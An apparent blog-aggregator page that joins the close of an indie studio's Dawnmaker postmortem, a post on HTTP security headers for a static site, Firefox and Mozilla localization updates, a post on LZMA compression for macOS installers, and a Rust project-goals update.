I mentioned earlier that we spent a lot of time in preproduction, working on finding the best version of the core gameplay of our game. I said it was a good thing, but it's also a bad one because it took us way too long to find it. And the reason is simple: we did prototyping wrong.

Screenshot of Dawnmaker, January 2023 <figcaption>Dawnmaker in January 2023</figcaption>

The goal of prototyping is to answer one or a few questions as fast as possible. In order to do that, you need to focus on building just what you need to answer your question, and nothing else. If you start putting actual art in your gameplay prototype, or gameplay in your art prototype, then you're not making a prototype: you're making a game. That's what we did. Too early, we started adding art to our gameplay prototype. Our first recorded prototype, which we did in Godot, had some art in it. Basic art, sure, but art anyway. The time it took to integrate the art into that prototype is time that was not spent answering the main question the prototype was supposed to answer — at that time: was the core gameplay loop fun?

It might seem inconsequential in a small prototype, but that cost quickly adds up. You're not as agile as you would be if you focused on only one thing. You're solving issues related to your assets instead of focusing on gameplay. And then you're a bit disappointed because it doesn't look too great so you start spending time improving the art. Really quickly you end up building a small game, instead of building a small prototype. Our first prototype even had sound! What the hell? Why did we put sound in a prototype that was crap, and was meant to help us figure out that the gameplay was crap?

Lesson learned

Make your prototypes as small and as focused as possible. Do not mix gameplay and art prototypes. Make sure each prototype answers one question. Prototype as many things as possible before moving on to preproduction.

Not playing to our strengths

I mentioned earlier that we had a 3D board in the game for a few months. Going 3D was a mistake that cost us a lot of time, because I had to program the whole thing in an environment that had few tools and conveniences — we were not using an engine like Godot or Unity. And I was not good at 3D; I had never worked on a 3D game before, so I had to learn a lot in order to build something functional. The end result was something that worked, but wasn't very pleasant to look at. It had performance issues on my computer, and it had bugs that I had no clue how to debug. We ended up ditching the whole 3D board after a lot of discussions and conflicts. The ultimate nail in the coffin came from a publisher who had been shown the game, and who asked: "what is the added value of 3D for this game?" Being unable to give a satisfying answer, we moved back to a 2D board, and were much better for it.

Screenshot of Dawnmaker with a 3D board <figcaption>Dawnmaker in June 2023, with a 3D board</figcaption>

So my question is: why did we go 3D for that period of time? I think there were two reasons working together to send us into that trap. The first one is that we did not assess our strengths and weaknesses enough. Alexis's strength was making 3D art, while I had no experience implementing 3D in a game, and we knew it, but we did not weigh those factors enough. The second reason is that we did not know enough about our tools to figure out that we could find a good compromise. See, we thought that we could either go 3D and build everything in 3D, from building models in Blender to integrating them on a 3D board in the game, or we could go 2D, which would simplify my work but would force Alexis to draw sprites by hand.

What we figured out later on was that there were tools that allowed Alexis to work in 3D, creating models and animations in Blender, and then export everything to a 2D environment very easily. There was a way to have the best of both worlds, exploiting our strengths without requiring us to learn something new and complex — which we definitely did not want to do for our first commercial game. Our mistake was not taking the time to research that, to find that compromise.

Lesson learned

Research the tools at your disposal, and always look for the most efficient way to do things. Play to the strengths of your team, especially for your first games.

Building a vertical slice instead of a horizontal one

We struggled a lot to figure out what our vertical slice should be. How could we prove that our game was viable to a potential investor? That's what the vertical slice is supposed to do, by providing a "slice" of your game that is representative of the final product you intend to build. It's supposed to have a small subset of your content, like a level, with a very high level of polish. How do you do that for a game that is systemic in nature? How do you build the equivalent of a "level" of a game like Dawnmaker?

We did not find a proper answer to this question. We were constantly juggling priorities between adding systems, because we needed to prove that the game worked and was fun, and adding signs, feedback and juice, because we believed we had to show what the final product would look and feel like. We were basically building the entire game, instead of just a slice of it. This was in part because we had basically no credentials to our name, as Dawnmaker was our first real game, and we feared publishers would have trouble trusting that we would be able to execute the "icing" part of the game. I still think that's a real problem, and the only solution that I see is to not try to go for funding for your first games. But I'll talk more about that in the Company strategy section below.

Screenshot of Dawnmaker, November 2023 <figcaption>Dawnmaker in November 2023</figcaption>

However, I recently came across the concept of the horizontal slice, as opposed to the vertical slice, and it blew my mind. The idea is, instead of building a small piece of your game at final quality, to build almost all of the base layers of the game. So, you would build all the systems, a good chunk of the content, everything that is required to show that the gameplay works and is fun, without working on the game's feel, its signs and feedback, a tutorial, and so on. No icing on the cake, just the meat of it. (Meat in a cake? Yeah, that sounds weird. Or British, I don't know.) The goal of the horizontal slice is to prove that the game as a whole works, that all the systems fit together in harmony, and that the game is fun.

I believe that this is a much better model for a game like Dawnmaker. A game like Mario is fun because it has great controls, pretty assets and funny situations. That's what you prove with a vertical slice. But take a game like Balatro. It is fun because it has reached a balance between all the systems, because it has enough depth to provide a nearly-endless replayability. Controls, feedback and juice are still important of course, but they are not the core of the game, and thus when building such a game, one should not focus on those aspects, but on the systems. We should have done the same with Dawnmaker, and I'll be aiming for a horizontal slice with my next strategy game for sure.

Lesson learned

Different types of games require different processes. Find the process that best serves the development of yours. If you're making some sort of systemic game, maybe building a horizontal slice is a better tool than going for the commonly used vertical slice?

Game weaknesses

Let's now talk about the game itself. Dawnmaker received really good reviews, but I still believe it is lacking in many ways. There are many problems with the gameplay: it lacks some form of adjustable difficulty, to make it a better challenge for a wider range of players. It lacks a more rewarding and engaging meta-progression. And of course it lacks content, as we never actually did our production phase.

Weak meta-progression

As I wrote earlier, I am very happy with the core loop of Dawnmaker. However, I think we failed big with its meta-progression. We decided to make it a roguelike, meaning that there is no progression between runs. You always start a run from the same state. Many players disliked that, and I now understand why, and why roguelites have gained so much popularity.

I recently read an article by Chris Zukowski where he discusses the kind of difficulty that Steam players like. I agree with his analysis and his concept of the "Easy-Hard-Easy (but variable)" difficulty, as I think it's behind a lot of the big successes on Steam these last few years. To summarize (read the article for more details), players like to have an easy micro-loop (the core actions of the game, what you do during one turn), a hard macro-loop (the medium-term goals, in our case getting enough Eclairium to level up before running out of Luminoil), and on top of that, a meta-progression that they have a lot of control over, and that allows them to adjust the difficulty of the challenge. An example I like a lot is Hades and its Mirror of Night: playing the game is easy, controls are great, but winning a run is very hard. However, by choosing to grind darkness and using it to unlock certain upgrades in the mirror, you get to make the challenge a lot easier. But someone else might decide to not grind darkness, or not spend it, and play with a much greater challenge. The player has a lot of control over the difficulty of the game.

Screenshot of Dawnmaker's world map <figcaption>Dawnmaker's world map</figcaption>

I think this is the biggest miss of Dawnmaker in terms of gameplay. Players cannot adjust the difficulty of the game to their tastes, which has been frustrating for a lot of them. Some complained it was way too hard while others found the game too easy and would have enjoyed more of a challenge. All of them would have enjoyed the game a lot more had they had a way to control the challenge one way or another. Our mistake was to have some progression inside a run, but not outside of it. A player can grow stronger during a run, improving their decks or starting resources, but when they lose a run they have to start from scratch again. A player who struggles with the challenge has no way to smooth the difficulty; they have to work and learn how to play better. The "git gud" philosophy might work in some genres, but evidently it didn't fit the audience of Dawnmaker.

This is not something that would have been easy to add though. I think it's something that needs to be thought about quite early in the process, as it impacts the core gameplay a lot. We tried to add meta-progression to our game too late in the process, and that's a reason we failed: it was too difficult to add good progression without impacting the careful balance of the core gameplay, and having to profoundly rework it.

Lesson learned

Offering an adaptive challenge is important for Steam players, and meta-progression is a good tool to do that. But it needs to be anticipated relatively early, as it is tightly tied to your core gameplay.

Lack of a strong fantasy

I believe the biggest cause of Dawnmaker's financial failure is that it lacks a strong fantasy. That gave us a lot of trouble, mostly when trying to sell the game to players. Presenting it as "city building meets deckbuilding" is not a fantasy, it's a pair of genres. We tried to put forward the "combo" gameplay, explaining that cards and buildings combine to create powerful effects, but as I just wrote, that's gameplay, not a fantasy. Our fantasy was to "bring life back to a dead world", but that's not nearly strong enough: it's neither surprising nor exciting.

Screenshot of Dawnmaker, February 2024 <figcaption>Dawnmaker in February 2024</figcaption>

In hindsight, I believe we missed a huge opportunity in making the zeppelin our main fantasy. It's something that's not often seen in games, it's a great figure for the ambiance of the game, and I think it would have helped create a better meta-progression. We have an "Airship" view in the game, where players can improve their starting state for the next region they're going to explore, but it's a very basic UI. There was potential to make something more exciting there.

The reason for this failure is that we started this project with mechanics and not with the fantasy. We spent a long time figuring out what our core gameplay would be, testing it until it was fun. And only then did we ask ourselves what the fantasy should be. It turns out that putting a fantasy and a theme on top of gameplay is not easy. I don't mean to say it's impossible, some have successfully done it, but I believe it is much harder than starting with an exciting fantasy and building gameplay on top of it.

Lesson learned

Marketing starts day 1 of the creation of a game. The 2 key elements that sell your game are the genre(s) of the game, and its fantasy or hook. Do not neglect those if you want to make money with your game.

This mistake was in part caused by me being focused primarily on mechanics as a game designer. I often start a project with a gameplay idea, a gimmick or a genre, but rarely with a theme, emotion or fantasy. It's not a problem to start with mechanics, of course. But the fantasy is what sells the game. My goal for my next games, as a designer, is to work on finding a strong fantasy that fits my mechanics much earlier in the process, and build on it instead of trying to shove it into an advanced core loop.

Company strategy

Oooo boy did we make mistakes on a company level. By that I mean, with managing our money. We messed up pretty bad — though seeing stories that pop up regularly on some gamedev subreddits, it could have been way worse. Doesn't mean there aren't lessons to be learned here, so let's dive in!

Hiring too soon, too quick

Managing money is difficult! Or at least, we've not been very good at it. We made the mistake of spending money at the wrong time or on the wrong things several times. That mainly happened because we had too much trust in the future, in the fact that we would find money easily, either by selling our game or by getting public money or investors. While we did get some public funding, it was not nearly enough to cover what we spent, and so Dawnmaker was mostly paid for by our personal savings.

The biggest misplacement of money we made was poor hiring. We made two different mistakes here: on one occasion, we hired someone without properly testing that person and making sure they would fit our team and project. On the other, we hired someone only to realize when they started that we did not have work to give them, because we were way too early in the game's development. Both recruitments ended up costing us a significant amount of money while bringing very little value to the game or the company.

But those failed recruitments had another bad consequence: we hurt people in the process. Our inexperience has been a source of pain for human beings who chose to trust us. That is a terrible feeling for me. I don't know what more to write about this, other than I think I've learned and I hope I won't be hurting others in the future. I'll do my best anyway.

Lesson learned

Hiring is freaking hard. Do not rush it. It's better to not hire than to hire the wrong person.

Too much investment into our first game

I've talked about it already in previous sections, but the biggest strategic mistake on Dawnmaker was to spend so much time on it. Making games is hard, making games that sell is even harder, and there's an incredible amount of luck involved. Of course, the better your game, the higher your chances. But making good games requires experience. Investing 2.5 years into our first commercial game was way too risky: the more time we spent on the game, the more money it needed to make, and I don't believe a game's revenue scales with the time invested in it.

Side note: we made a game before Dawnmaker, called Phytomancer — it's available on itch.io for 3€ — but because it had no commercial ambition, I don't think it counts for much in the key areas of making games that sell.

Here are facts:

Dawnmaker vertical capsule

  • Dawnmaker cost us about 320k€ to make — read my in-depth article about Dawnmaker's real cost for more details — and only made us about 8k€ in net revenue. That is a financial catastrophe, only possible because we invested a lot of our time and personal savings, and we benefited from some French social welfare.
  • Most indie studios close after they release their first game. It's unclear what the exact causes are, but from personal experience, I bet it's in large part because those companies invest too much in their first game and have nothing left when it comes to making the second one — either money or energy. We tend to burn cash and ourselves out.
  • And there's the economic context too: investment in games and game companies has slowed to a trickle over the past couple of years, and it doesn't seem to be going back up soon. Games are very expensive to make, and the actors that used to pay for their production (publishers, investors) are not playing that role anymore.

Considering this, I strongly believe that today, investing several years into making your first game is not a valid company strategy. It's engaging in an act of faith. And a business should not run on faith. What pains me is that we knew this when we started Arpentor Studio, and we wanted to make Dawnmaker in about a year. But we lacked the discipline to actually keep that deadline, and we lost ourselves in the process. We got heavily side-tracked by thinking we could get some funding, by growing our scope to ask for more money, etc. We didn't start the project with a clear objective, with a strict deadline. So we kept delaying and delaying. We had the comfort of having decent money reserves. We never thought about what would happen after releasing Dawnmaker, never asked ourselves what our situation would be if the game took 3 years to release and didn't make any money. We should have.

Lesson learned

Start by making small games! Learn, experiment, grow, then go for bigger games when you're in a better position to succeed.

Here are my arguments for making several small games instead of investing too much into a single bigger game. Note that these are aimed at folks trying to build a game studio, to make a business of selling games. If your goal is to create your dream game, or if you're in it for the art but don't care about the money, this likely does not apply to you.

  • By releasing more games, you gain a lot of key experience in the business of making games that sell. You receive more player feedback. You have the opportunity to try more things. You learn the tricks of the platform(s) you're selling on — Steam is hard!
  • By releasing more games, you give yourself more chances to break out, to hit that magic moment when a game finds its audience, because it arrives at the right moment, in the right place. (For more on this, I highly recommend this article by Ryan Rigney: Nobody Knows If Your Game Will Pop Off, where the author talks about ways of predicting a hit and the correlation between the number of hits and the number of works produced.)
  • By releasing more games, you build yourself a back catalog. Games sell more on their first day, week or month, for sure, but that doesn't mean they stop selling afterwards. Games on Steam keep generating revenue for a long time, even if a small one. And a small revenue is infinitely better than no revenue at all. And small revenues can pile up to make, who knows, a decent revenue?
  • By releasing more games, you grow your audience. Each game is a way to reach new people and bring them to your following — be it through a newsletter, a discord server or your social networks. The bigger your audience, the higher your chances of selling your next game.
  • By releasing more games, you build your credibility as a game developer. When you go to an investor to show them your incredible new idea, you will make a much better impression if you have already released 5 games on Steam. You prove to them that you know how to finish a game.

Keep in mind that making small games is really, really hard. It requires a lot of discipline and planning. This is where we failed: we wanted to make our game in one year, but never planned that time. We never wrote down what our deadline was, never budgeted that year into milestones. If you want to succeed there, you need to accept that your game will not be perfect, or even good. That's fine. The goal is not to make a great game, it's to release a game. However imperfect that game is, the success criterion is not its quality, or its sales numbers. The number one success criterion is that people can buy it.

Dawnmaker's cinematic release trailer

Conclusion

I wanted to end here, because I think this is the most important thing to learn from this post-mortem. If you're trying to build a sustainable game studio, if you're in it for the long run, then please, please start by making small games. Don't gamble on a crazy-big first game. Garner experience. Learn how the market works. Try things in a way that will cost you as little as possible. Build your audience and your credibility. Then, when the time is right, you'll be much better equipped to take on bigger projects. That doesn't mean you will automatically succeed, but your chances will be much, much higher.

As for myself? Well, I'm trying to learn from my own mistakes. My next project will be a much shorter one, with strict deadlines and milestones. I will capitalize on what I made for Dawnmaker, reusing as much of the tooling and wisdom as possible, and trying to make the best possible game with the time, money and resources I have. All I can say for now is that it's going to be a deckbuilding strategy game about an alchemist trying to create the Philosopher's Stone. I will talk about it more on my blog and on Arpentor's newsletter, so I hope you'll follow me into that next adventure!

Subscribe to Arpentor Studio's Newsletter! One email about every other month, no spam, with insights on the development of our games and access to early versions of future projects.

Thanks a lot to Elli for their proofreading of this very long post!

Don Marti: security headers for a static site

This site now has an OPML version (XML) of the blogroll. What can I do with it? It seems like the old Share your OPML site is no more. Any ideas?

Also went through Securing your static website with HTTP response headers by Matt Hobbs and got a clean bill of health from the Security Headers site. Here’s what I have on here as of today:

Access-Control-Allow-Origin "https://blog.zgp.org/"
Cache-Control "max-age=3600"
Content-Security-Policy "base-uri 'self'; default-src 'self'; frame-ancestors 'self';"
Cross-Origin-Opener-Policy "same-origin"
Permissions-Policy "accelerometer=(),autoplay=(),browsing-topics=(),camera=(),display-capture=(),document-domain=(),encrypted-media=(),fullscreen=(),geolocation=(),gyroscope=(),magnetometer=(),microphone=(),midi=(),payment=(),picture-in-picture=(),publickey-credentials-get=(),screen-wake-lock=(),sync-xhr=(self),usb=(),web-share=(),xr-spatial-tracking=()" "expr=%{CONTENT_TYPE} =~ m#text\/(html|javascript)|application\/pdf|xml#i"
Referrer-Policy no-referrer-when-downgrade
Cross-Origin-Resource-Policy same-origin
Cross-Origin-Embedder-Policy require-corp
Strict-Transport-Security "max-age=2592000"
X-Content-Type-Options: nosniff

(update 2 Feb 2025) This site has some pages with inline styles, so I can’t use that CSP line right now. This is because I use the SingleFile extension to make mirrored copies of pages, so I need to move those into their own virtual host so I can go back to using the version without the unsafe-inline.

(update 23 Feb 2025) The Pagefind site search requires ‘unsafe-eval’ in CSP in order to support WASM. This should be wasm-unsafe-eval in the future.

To do WASM and inline styles, the new value for the Content-Security-Policy header is:

"base-uri 'self'; default-src 'self'; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-eval'; frame-ancestors 'self';"

I saved a copy of Back to the Building Blocks: A Path Toward Secure and Measurable Software (PDF). The original seems to have been taken down, but it’s a US Government document so I can keep a copy on here (like the FBI alert that got taken down last year, which I also have a copy of.)

Bonus links

Why is Big Tech hellbent on making AI opt-out? by Richard Speed. Rather than asking we’re going to shovel a load of AI services into your apps that you never asked for, but our investors really need you to use, is this OK? the assumption instead is that users will be delighted to see their formerly pristine applications cluttered with AI features. Customers, however, seem largely dissatisfied. (IMHO if the EU is really going to throw down and do a software trade war with the USA, this is the best time to switch to European Alternatives.
Big-time proprietary software is breaking compatibility while independent alternatives keep on going. People lined up for Microsoft Windows 95 in 1995 and Apple iPhones in 2007, and a trade war with the USA would have been a problem for software users then, but now the EuroStack is a thing. The China stack, too, as Prof. Yu Zhou points out: China tech shrugged off Trump’s ‘trade war’ − there’s no reason it won’t do the same with new tariffs. I updated generative ai antimoats with some recent links. Even if the AI boom does catch on among users, services that use AI are more likely to use predictable independently-hosted models than to rely on Big Tech APIs that can be EOLed or nerfed at any time, or just have the price increased.)

California vs Texas Minimum Wage, 2013-2024 by Barry Ritholtz. [F]or seven years–from January 2013 to March 2020–[California and Texas quick-service restaurant] employment moved almost identically, the correlation between them 0.994. During that seven year period, however, TX had a flat $7.25/hr minimum wage while CA increased its minimum wage by 50%, from $8/hr to $12. Related: Is a Big Mac in Denmark Pricier Than in US?

What’s happening on RedNote? A media scholar explains the app TikTok users are fleeing to – and the cultural moment unfolding there Jianqing Chen covers the Xiaohongshu boom in the USA. This spontaneous convergence recalls the internet’s original dream of a global village. It’s a glimmer of hope for connection and communication in a divided world. (This is such authentic organic social that the Xiaohongshu ToS hasn’t even been translated into English yet. And not only does nobody read privacy policies (we knew that) but videos about reuniting with your Chinese spy from TikTok are a whole trend on there. One marketing company put up a page of Rules & Community Guidelines translated into English but I haven’t cross-checked it. Practice the core socialist values. and Promote scientific thinking and popularize scientific knowledge.)

Bob Sullivan reports Facebook acknowledges it’s in a global fight to stop scams, and might not be winning (The bigger global fight they’re in is a labor/management one, and when moderator jobs get less remunerative or more stressful, the users get stuck dealing with more crime.) Related: Meta AI case lawyer quits after Mark Zuckerberg’s ‘Neo-Nazi madness’; Llama depositions unsealed by Amy Castor and David Gerard. (The direct mail/database/surveillance marketing business, get-rich-quick schemes, and various right-wing political movements have been one big overlapping scene in the USA for quite a while, at least back to the Direct Mail and the Rise of the New Right days and possibly further. People in the USA get targeted for a lot of political disinformation and fraud (one scheme can be both), so the Xiaohongshu mod team will be in for a shock as scammers, trolls, and worse will follow the US users onto their platform.)

Firefox Nightly: New Year New Tab – These Weeks in Firefox: Issue 175

Highlights

  • Firefox 134 went out earlier this month!
  • A refreshed New Tab layout is being rolled out to users in the US and Canada, featuring a repositioned logo and weather widget to prioritize Web Search, Shortcuts, and Recommended Stories at the top. The update includes changes to the card UI for recommended stories and allows users with larger screens to see up to four columns, making better use of space.
    • The Firefox New Tab page is shown with the browser logo in the top-left, the weather indicator in the top-right, and 4 columns of stories rather than 3.

      Making better use of the space on the New Tab page!

  • dao enabled the ability to search for closed and saved tab groups (Bug 1936831)
  • kcochrane landed a keyboard shortcut for expanding and collapsing the new sidebar
    • Collapse/Expand sidebar (Ctrl + Alt + Z) – for Linux/Win
    • Collapse/Expand sidebar (⌃Z) – for macOS

Friends of the Firefox team

Resolved bugs (excluding employees)

Script to find new contributors from bug list

Volunteers that fixed more than one bug

  •  Karan Yadav

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

Addon Manager & about:addons
  • Fixed about:addons blocklist state message-bars not refreshed when the add-on active state doesn’t change along with the blocklist state (Bug 1936407)
  • Fixed a moz-toggle button related visual regression in about:addons (regression introduced from Bug 1917305 in Nightly 135 and fixed in the same release by Bug 1937627)
  • Adjusted popup notification primary button default string to match the Acorn style guide (Bug 1935726)
WebExtensions Framework
  • Fixed an add-on debugging toolbox regression on resending add-ons network requests from the DevTools Network panel (regression introduced in Nightly 134 from Bug 1754452 and fixed in Nightly 135 by Bug 1934478)
    • Thanks to Alexandre Poirot for fixing this add-on debugging regression
WebExtension APIs
  • Fixed notification API event listeners not restarting suspended extension event pages (Bug 1932263)
  • As part of the work for the MV3 userScripts API (currently locked behind a pref in Nightly 134 and 135):
    • Introduced permission warning in the Firefox Desktop about:addons extensions permissions view (Bug 1931545)
    • Introduced userScripts optional permissions request dialog on Firefox Desktop (Bug 1931548)
    • NOTE: An MV3 userScripts example extension to be added to the MDN webextensions-examples repo is being worked on in the following GitHub pull request: https://github.com/mdn/webextensions-examples/pull/576
    • The permission warning in the Firefox Desktop about:addons extensions permissions view. It shows a warning: "Unverified scripts can pose security and privacy risks, such as running harmful code or tracking website activity. Only run scripts from extensions or sources you trust." The WebExtension permission request dialog shown in Firefox Desktop when installing or updating an extension. It shows a warning: "Unverified scripts can pose security and privacy risks. Only run scripts from extensions or sources you trust."

DevTools

DevTools Toolbox
WebDriver BiDi
  • External:
    • Liam (:ldebeasi) added support for the format argument to the browsingContext.captureScreenshot command. Clients can use it to specify an image format with a type such as “image/jpg” and a quality ranging between 0 and 1 (#1861737)
    • Spencer (:speneth) created a helper to check if a browsing context is a top-level browsing context (#1927829)
  • Internal:
    • Sasha landed several fixes to allow saving minidump files easily with geckodriver for both Firefox on desktop and mobile, which will allow debugging crashes more efficiently (#1882338, #1859377, #1937790)
    • Henrik enabled the remote.events.async.enabled preference, which means we now process and dispatch action sequences in the parent process (#1922077)
    • Henrik fixed a bug with our AnimationFramePromise which could cause actions to hang if a navigation was triggered (#1937118)

Information Management

  • We’re delaying letting the new sidebar (sidebar.revamp pref) ride the trains while we address findings from user diary studies, experiments and other feedback. Stay tuned!
  • Reworked the vertical tabs mute button in Bug 1921060 – Implement the full mute button spec
  • We’re focusing on fixing papercuts for the new sidebar and vertical tabs.

Migration Improvements

  • We’ve concluded the experiment that encouraged users to create or sign-in to Mozilla accounts to sync from the AppMenu and FxA toolbar menu. We’re currently analyzing the results.
  • Before the end of 2024, we were able to get some patches into 135 that will let us try some icon variations for the signed-out state for the FxA toolbar menu button. We’ll hopefully be testing those when 135 goes out to release!

Performance Tools (aka Firefox Profiler)

  • We added a new way to filter the profile to only include data related to the tab you would like to see, by adding a tab selector. You can see this by clicking the “Full Profile” button in the top left corner. This allows web and Gecko developers to focus on a single website.
    • A dropdown selector is shown above the tracks in the Firefox Profiler UI. The dropdown lists "All tabs and windows" and then "browser", followed by a list of individual domains. like "www.mozilla.org" and "www.google.com".
  • We implemented a new way to control the profiler using POSIX signals on macOS and Linux. You can send SIGUSR1 to the Firefox main process to start the profiler and SIGUSR2 to stop and dump the profile to disk. We hope that this feature will be useful for cases where Firefox is completely frozen and using the usual profiler buttons is not an option. See our documentation here.
  • Lots of performance work to make the profiler itself faster.

Search and Navigation

Scotch Bonnet

  • Mandy enhanced restricted search keywords so that users can use both their own localized language and the English shortcut Bug 1933003
  • Daisuke fixed an issue where pressing Ctrl+Shift+Tab while the Unified Search Button was enabled and the address bar was focused would not go to the previous tab Bug 1931915
  • Daisuke also fixed an issue where focusing the urlbar with a click and then pressing Shift+Tab wouldn’t focus the Unified Search Button Bug 1933251
  • Daisuke made the Unified Search Button keyboard-focusable via Shift+Tab after focusing the address bar with Ctrl+L Bug 1937363
  • Daisuke changed the behavior of the Unified Search Button to show when editing a URL rather than on initial focus Bug 1936090
  • Lots of other papercuts fixed by the team

Search

  • Mandy initiated the removal of old application-provided search engine WebExtensions from a user's profile, as they are no longer required due to the usage of search-config-v2 Bug 1885953

Suggest

  • Drew implemented a new simplified UI treatment for Weather Suggestions Bug 1938517
  • Drew removed the Suggest JS Backend as the Rust based backend was enabled by default in 124 Bug 1932502

Storybook/Reusable Components

  • Anna Kulyk added new --table-row-background-color and --table-row-background-color-alternate design tokens Bug 1919313
  • Anna Kulyk added support for the panel-item disabled attribute Bug 1919122

Mozilla Localization (L10N): L10n report: January 2025 Edition

Please note some of the information provided in this report may be subject to change as we are sometimes sharing information about projects that are still in early stages and are not final yet. 

Welcome!

Are you a locale leader and want us to include new members in our upcoming reports? Contact us!

New content and projects

What’s new or coming up in Firefox desktop

Tab Groups

Tab groups are now available in Nightly 136! To create a group in Nightly, all you have to do is have two tabs open, click and drag one tab to the other, pause a sec and then drop. From there the tab group editor window will appear where you can name the group and give it a color. After saving, the group will appear on your tab bar.

Once you create a group, you can easily access your groups from the overflow menu on the right.

 

These work great with the sidebar and vertical tabs feature that was released through Firefox Labs in Nightly 131!

New profile selector

The new profile selector, which we have been localizing over the previous months, is now starting to roll out gradually to users in Nightly 136. SUMO has an excellent article about all the new changes, which you can find here.

What’s new or coming up in web projects

AMO and AMO Frontend

The team is planning to migrate/copy the Spanish (es) locale into four: es-AR, es-CL, es-ES, and es-MX. Per the community managers’ input, all locales will retain the suggestions that have not been approved at the time of migration. Be on the lookout for the changes in the upcoming week(s).

Mozilla Accounts

The Mozilla accounts team recently landed strings used in three emails planned to be sent over the course of 90 days, with the first happening in the coming weeks. These will be sent to inactive users who have not logged in or interacted with the Mozilla accounts service in 2 years, letting them know their account and data may be deleted.

What’s new or coming up in SUMO

The CX team is still working on 2025 planning. In the meantime, read a recap from our technical writer, Lucas Siebert about how 2024 went in this blog post. We will also have a community call coming up on Feb 5th at 5 PM UTC. Check out the agenda for more detail and we’d love to see you there!

Last but not least, we will be at FOSDEM 2025. Mozilla’s booth will be at the K building, level 1. Would love to see you if you’re around!

What’s new or coming up in Pontoon

New Email Features

We’re excited to announce two new email features that will keep you better informed and connected with your localization work on Pontoon:

Email Notifications: Opt in to receive notifications via email, ensuring you stay up to date with important events even when you’re away from the platform. You can choose between daily or weekly digests and subscribe to specific notification types only.

Monthly Activity Summary: If enabled, you’ll receive an email summary at the start of each month, highlighting your personal activity and key activities within your teams for the previous month.

Visit your settings to explore and activate these features today!

New Translation Memory tools are here!

If you are a locale manager or translator, here’s what you can do from the new TM tab on your team page:

  • Search, edit, and delete Translation Memory entries with ease.
  • Upload .TMX files to instantly share your Translation Memories with your team.

These tools are here to save you time and boost the quality of suggestions from Machinery. Dive in and explore the new features today!

Moving to GitHub Discussions

Feedback, support and conversations on new Pontoon developments have moved from Discourse to GitHub Discussions. See you there!

Newly published localizer facing documentation

Events

Come check out our end of year presentation on Pontoon! A Youtube link and AirMozilla link are available.

Want to showcase an event coming up that your community is participating in? Contact us and we’ll include it.

Friends of the Lion

Know someone in your l10n community who’s been doing a great job and should appear here? Contact us and we’ll make sure they get a shout-out!

Useful Links

Questions? Want to get involved?

If you want to get involved, or have any question about l10n, reach out to:

Did you enjoy reading this report? Let us know how we can improve it.

Firefox Nightly: Firefox on macOS: now smaller and quicker to install!

Firefox is typically installed on macOS by downloading a DMG (Disk iMaGe) file, and dragging the Firefox.app into /Applications. These DMG files are compressed to reduce download time. As of Firefox 136, we’re making an under-the-hood change to them, switching from bzip2 to lzma compression, which shrinks their size by ~9% and cuts decompression time by ~50%.

Why now?

If you’re familiar with macOS packaging, you’ll know that LZMA support was introduced in macOS 10.15, all the way back in 2019. However, Firefox continued to support older versions of macOS until Firefox 116.0 was released in August 2023, which meant that we couldn’t use it prior to then.

But that still raises the question: why wait ~18 months to realize these improvements? Answering that question requires a bit of explanation of how we package Firefox…

Packaging Firefox for macOS… on Linux!

Most DMGs are created with hdiutil, a standard tool that ships with macOS. hdiutil is a fine tool, but unfortunately, it only runs natively on macOS. This is a problem for us, because we package Firefox thousands of times per day, and it is impractical to maintain a fleet of macOS machines large enough to support this. Instead, we use libdmg-hfsplus, a 3rd party tool that runs on Linux, to create our DMGs. This allows us to scale these operations as much as needed for a fraction of the cost.

Why now, redux

Until recently, our fork of libdmg-hfsplus only supported bzip2 compression, which of course made it impossible for us to use lzma. Thanks to some recent efforts by Dave Vasilevsky, a wonderful volunteer who previously added bzip2 support, it now supports lzma compression.

We quietly enabled this for Firefox Nightly in 135.0, and now that it’s had some bake time there, we’re confident that it’s ready to be shipped on Beta and Release.

Why LZMA?

DMGs support many types of compression: bzip2, zlib, lzfse and lzma being the most notable. Each of these has strengths and weaknesses:

  • bzip2 has the best compression (in terms of size) that is supported on all macOS versions, but the slowest decompression
  • zlib has very fast decompression, at the cost of increased package size
  • lzfse has the fastest decompression, but the second largest package size
  • lzma has the second fastest decompression and the best compression in terms of size, at the cost of increased compression times

With all of this in mind, we chose lzma to make improvements on both download size and installation time.

You may wonder why download size is an important consideration, seeing as fast broadband connections are common these days. This may be true in many places, but not everyone has the benefits of a fast unmetered connection. Reducing download size has an outsized impact for users with slow connections, or those who pay for each gigabyte used.

What does this mean for you?

Absolutely nothing! Other than a quicker installation, you should see no changes to the Firefox install experience.

Of course, edge cases exist and bugs are possible. If you do notice something that you think may be related to this change please file a bug or post on discourse to bring it to our attention.

Get involved!

If you’d like to be like Dave, and contribute to Firefox development, take a look at codetribute.mozilla.org. Whether you’re interested in automation and tools, the Firefox frontend, the Javascript engine, or many other things, there’s an opportunity waiting just for you!

Mozilla Addons Blog: Announcing the WebExtensions ML API

Greetings extension developers!

We wanted to highlight this just-published blog post from our AI team where they share some exciting news – we’re shipping a new experimental ML API in Firefox that will allow developers to leverage our AI Runtime to run offline machine learning tasks in their web extensions.

Head on over to Mozilla’s AI blog to learn more. After you’ve had a chance to check it out, we encourage you to share feedback, comments, or questions over on the Mozilla AI Discord (invite link).

Happy coding!

The post Announcing the WebExtensions ML API appeared first on Mozilla Add-ons Community Blog.

The Rust Programming Language Blog: December Project Goals Update

Over the last six months, the Rust project has been working towards a slate of 26 project goals, with 3 of them designated as Flagship Goals. This post provides a final update on our progress towards these goals (or, in some cases, lack thereof). We are currently finalizing plans for the next round of project goals, which will cover 2025H1. The full details for any particular goal are available in its associated tracking issue on the rust-project-goals repository.

Flagship goals

Our big goal for this period was async closures, and we are excited to announce that work there is done! Stable support for async closures landed on nightly on Dec 12 and it will be included in Rust 1.85, which ships on Feb 20. Big kudos to compiler-errors for driving that.

For our other goals, we made progress, but there remains work to be done:

  • Return Type Notation (RTN) is implemented and we had a call for experimentation but it has not yet reached stable. This will be done as part of our 2025H1 goal.
  • Async Functions in Traits (and Return Position Impl Trait in Trait) are currently not considered dyn compatible. We would eventually like to have first-class dyn support, but as an intermediate step we created a procedural macro crate dynosaur [1] that can create wrappers that enable dynamic dispatch. We are planning a comprehensive blog post in 2025H1 that shows how to use this crate and lays out the overall plan for async functions in traits.
